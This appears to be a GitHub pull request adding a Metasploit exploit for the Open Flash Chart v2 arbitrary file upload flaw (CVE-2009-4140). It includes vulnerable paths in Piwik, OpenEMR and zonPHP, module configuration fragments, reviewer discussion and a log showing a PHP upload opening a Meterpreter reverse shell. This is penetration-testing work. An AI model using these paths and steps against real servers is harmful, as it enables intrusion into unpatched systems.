Add Open Flash Chart v2 Arbitrary File Upload exploit #2572

Merged
merged 1 commit into from Oct 24, 2013


@bcoles
Contributor
bcoles commented Oct 24, 2013

Add Open Flash Chart v2 Arbitrary File Upload exploit

Version: 2.x
Source: http://sourceforge.net/projects/openflashchart/
Tested on: Ubuntu

  • open-flash-chart v2-Lug-Wyrm-Charmer - set TARGETURI /php-ofc-library/
  • open-flash-chart v2-beta-1 - set TARGETURI /php-ofc-library/
  • zonPHP v2.25 - set TARGETURI /zonPHPv225/ofc/
  • Piwik v0.4.3 - set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/
  • OpenEMR v4.1.1 - set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/
@bcoles

GreatRanking as the directory may not be writable; and the payload will not execute if the $default_path variable value has been modified to an absolute file path.

@jvazquez-r7
Contributor

Processing...

@Meatballs1 Meatballs1 commented on the diff Oct 24, 2013
.../exploits/unix/webapp/open_flash_chart_upload_exec.rb
+ ['CVE', '2009-4140'],
+ ['OSVDB', '59051'],
+ ['EDB', '10532']
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 8190, # Just a big value, injection on HTTP POST
+ 'DisableNops' => true,
+ 'BadChars' => "\x00"
+ },
+ 'Arch' => ARCH_PHP,
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ # Tested on:
+ # * open-flash-chart v2-Lug-Wyrm-Charmer
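Review bot: the applications the module was verified against ('# Tested on:' inside 'Targets') and the TARGETURI each of them needs are recorded only as a code comment and in the PR description, where a user running 'info' or 'show options' never sees them; move that list into the module description or the target definitions so the required per-application base path is discoverable from the console, and keep the comment block short or drop it once the data lives in metadata.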
@Meatballs1
Meatballs1 Oct 24, 2013 Contributor

Wouldn't this be better as a hash of URIs and with an OptEnum to choose the correct version? With TARGETURI supplying any base path if required?

e.g.

uri = datastore['TARGETURI'] + targets[datastore['VERSION']]

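Taking the per-application TARGETURI list from the PR description together with Meatballs1's suggestion above, the following is an added example of what the hash-of-paths design looks like in plain Ruby. It is not the module's code and not Metasploit project code; OFC_VERSIONS, normalize_uri, build_ofc_uri and uploaded_file_uri are names chosen here, and the location of the uploaded file is inferred only from the '../tmp-upload-images/' path in the test log below, not from the module source.

```ruby
# Added example (not the module's or the project's code): Meatballs1's proposal
# of a per-version hash of library paths chosen by an OptEnum, with TARGETURI
# supplying the application's base path.  OFC_VERSIONS, normalize_uri,
# build_ofc_uri and uploaded_file_uri are names chosen for this example and are
# not Metasploit APIs.

# Library directory relative to each application's install base, derived from
# the TARGETURI values listed in the PR description.
OFC_VERSIONS = {
  'OpenFlashChart' => 'php-ofc-library/',                       # upstream 2.x releases
  'zonPHP'         => 'ofc/',                                   # zonPHP v2.25
  'Piwik'          => 'libs/open-flash-chart/php-ofc-library/', # Piwik v0.4.3
  'OpenEMR'        => 'library/openflashchart/php-ofc-library/' # OpenEMR v4.1.1
}.freeze

# Join path segments with exactly one slash between them and a single leading
# slash; plain string concatenation would turn '/' + 'php-ofc-library/' into
# '//php-ofc-library/'.
def normalize_uri(*parts)
  '/' + parts.map(&:to_s).join('/').gsub(%r{/+}, '/').sub(%r{\A/}, '')
end

# OptEnum-style selection: VERSION must be one of the known keys, otherwise the
# module would silently request a path that cannot exist on the target.
def build_ofc_uri(target_uri, version)
  rel = OFC_VERSIONS[version]
  unless rel
    raise ArgumentError,
          "unknown VERSION #{version.inspect}; expected one of #{OFC_VERSIONS.keys.join(', ')}"
  end
  normalize_uri(target_uri, rel)
end

# The test log shows the uploaded file being executed at
# '../tmp-upload-images/<name>' relative to the library directory, so its
# request URI is the library's parent directory plus that folder.
# (Assumption drawn from the log line, not from the module source.)
def uploaded_file_uri(lib_uri, filename)
  parent = File.dirname(lib_uri.sub(%r{/+\z}, ''))
  normalize_uri(parent, 'tmp-upload-images', filename)
end

if __FILE__ == $PROGRAM_NAME
  OFC_VERSIONS.each_key do |v|
    lib = build_ofc_uri('/app/', v)
    puts "#{v.ljust(15)} #{lib}  ->  #{uploaded_file_uri(lib, 'XwarY9wxRb.php')}"
  end
end
```

With this layout TARGETURI is only the install base (for example '/piwik/' or '/openemr-4.1.1/'), the version enum supplies the application-specific remainder, and a mistyped VERSION fails at option validation instead of producing a 404 mid-exploit.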
@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 24, 2013
jvazquez-r7 Land #2572, @bcoles's exploit for cve-2009-4140 cb3b302
@jvazquez-r7 jvazquez-r7 merged commit 8a5d4d4 into rapid7:master Oct 24, 2013

1 check passed: default, The Travis CI build passed
@jvazquez-r7
Contributor

Thanks @bcoles,

Landed after last cleanup here: 2ef33aa

Cleanup includes:

  • Allow FileDropper to clean
  • Fix the use of the Content-Type header on send_request_cgi
  • Register file to clean once the update has been successful.

Test:

msf exploit(open_flash_chart_upload_exec) > show options

Module options (exploit/unix/webapp/open_flash_chart_upload_exec):

   Name       Current Setting                                        Required  Description
   ----       ---------------                                        --------  -----------
   Proxies                                                           no        Use a proxy chain
   RHOST      192.168.172.133                                        yes       The target address
   RPORT      80                                                     yes       The target port
   TARGETURI  /open-flash-chart-2-Lug-Wyrm-Charmer/php-ofc-library/  yes       The base path to Open Flash Chart
   VHOST                                                             no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)


msf exploit(open_flash_chart_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.133:80 - Uploading 'XwarY9wxRb.php' (1786 bytes)...
[*] 192.168.172.133:80 - Executing '../tmp-upload-images/XwarY9wxRb.php'
[*] Sending stage (39195 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:37492) at 2013-10-24 10:11:47 -0500
[+] Deleted XwarY9wxRb.php

meterpreter > exit
@bcoles bcoles deleted the bcoles:open_flash_chart_upload_exec branch Dec 19, 2013